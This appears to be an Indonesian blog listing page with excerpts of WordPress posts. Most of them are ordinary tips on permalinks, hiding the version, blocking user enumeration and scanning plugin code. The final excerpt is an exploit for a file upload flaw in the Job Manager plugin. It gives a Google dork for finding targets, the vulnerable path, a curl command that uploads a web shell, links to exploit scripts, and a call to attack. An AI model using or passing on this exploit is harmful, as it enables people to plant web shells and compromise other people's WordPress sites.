Scan Kode Plugin WordPress dengan WPSploit - Kali ini saya bakal sharing tips seputar WordPress. WPSploit adalah tools yang ditulis dengan bahasa python dan difungsikan untuk melakukan scanning terhadap source code...
Halo teman teman kembali lagi bersama saya, kali ini saya akan memberikan tuturial cara menghilangkan permalink /blog/ pada website bawaan yang baru di install wordpress, permalink tersebut sudah ada sejak teman...
Blokir WordPress User Enumeration dengan Nginx - Memblokir enumerasi username merupakan upaya untuk mencegah terjadinya peretasan di blog atau cms WordPress. Karena jika attacker berhasil mendapatkan daftar username di WordPress, kesempatan...
Mengubah Struktur Permalink WordPress di Nginx - Sebenernya ini sekalian saya jadikan arsip atau cacatan pribadi soalnya tadi hampir sejam ngotak atik nginx rule biar permalink lawas di redirect ke permalink...
Cara Menyembunyikan Versi WordPress Yang Terinstall - Menyembunyikan versi WordPress yang kita install merupakan langkah pencegahan jika sewaktu waktu versi WordPress yang kita install terdapat celah atau bug. Karena scanner seperti...
Exploit Title: WordPress Plugin Job Manager File UploadGoogle Dork: inurl:/wp-content/uploads/job-manager-uploads/Vuln Path: /jm-ajax/upload_fileExample:www.target.com/jm-ajax/upload_file/( Vuln Target )Exploit:1. CSRF2. CURL POSTroot # curl -k -F "file=@shell.gif" "http://target.com/jm-ajax/upload_file/"Upload file anda dengan format .gif/.jpg/.pngScript:- https://pastebin.com/hp0jJr1g [PHP][CLI Based]- https://pastebin.com/FaACEDLg [BASH]Ayo kawan kita boom...
